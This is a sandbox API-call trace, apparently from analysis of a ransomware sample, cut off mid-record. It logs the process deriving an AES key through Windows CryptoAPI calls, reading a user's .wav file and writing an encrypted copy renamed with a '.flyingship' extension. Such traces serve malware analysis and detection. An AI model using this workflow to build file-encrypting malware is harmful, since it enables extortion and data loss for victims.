[0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vO_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ce7D.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.283] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0182.283] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.283] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.283] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f3a8660, ftCreationTime.dwHighDateTime=0x1d5de16, ftLastAccessTime.dwLowDateTime=0xbaaf0410, ftLastAccessTime.dwHighDateTime=0x1d5dc64, ftLastWriteTime.dwLowDateTime=0xbaaf0410, ftLastWriteTime.dwHighDateTime=0x1d5dc64, nFileSizeHigh=0x0, nFileSizeLow=0x181e2, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Ftar8k3covO_ce7D.wav", cAlternateFileName="FTAR8K~1.WAV")) returned 0x90ae18 [0182.284] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0182.284] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.284] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.284] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0182.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0182.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.284] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.284] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0182.285] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0182.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.285] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0182.285] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0182.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0182.285] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0182.285] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.285] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.286] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0182.286] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0182.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.286] CryptHashData (hHash=0x90af58, pbData=0x8df028, dwDataLen=0x19, dwFlags=0x1) returned 1 [0182.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0182.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.286] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0182.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.286] CryptDestroyHash (hHash=0x90af58) returned 1 [0182.287] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\ftar8k3covo_ce7d.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0182.287] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.287] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0182.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0182.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0182.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0182.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0182.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.287] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0182.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0182.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0182.288] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0182.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf0) returned 0x9004f0 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9004f0 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0182.289] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp")) returned 0x10 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6f00 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0182.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0182.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0182.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0182.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0182.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0182.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\ftar8k3covo_ce7d.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0182.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0182.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0182.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0182.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0182.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.307] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0182.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0182.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0182.308] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0182.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0182.309] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0182.309] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0182.312] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x81e2, lpOverlapped=0x0) returned 1 [0182.313] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0182.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0182.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0182.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x181e2) returned 0xbea018 [0182.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0182.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0182.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0182.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0182.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0182.315] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x181e2) returned 0xa5f008 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x181e2) returned 0xbea018 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.317] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0182.317] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0182.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0182.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0182.318] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0182.318] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0182.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0182.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26b8 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x181e2) returned 0xbea018 [0182.318] 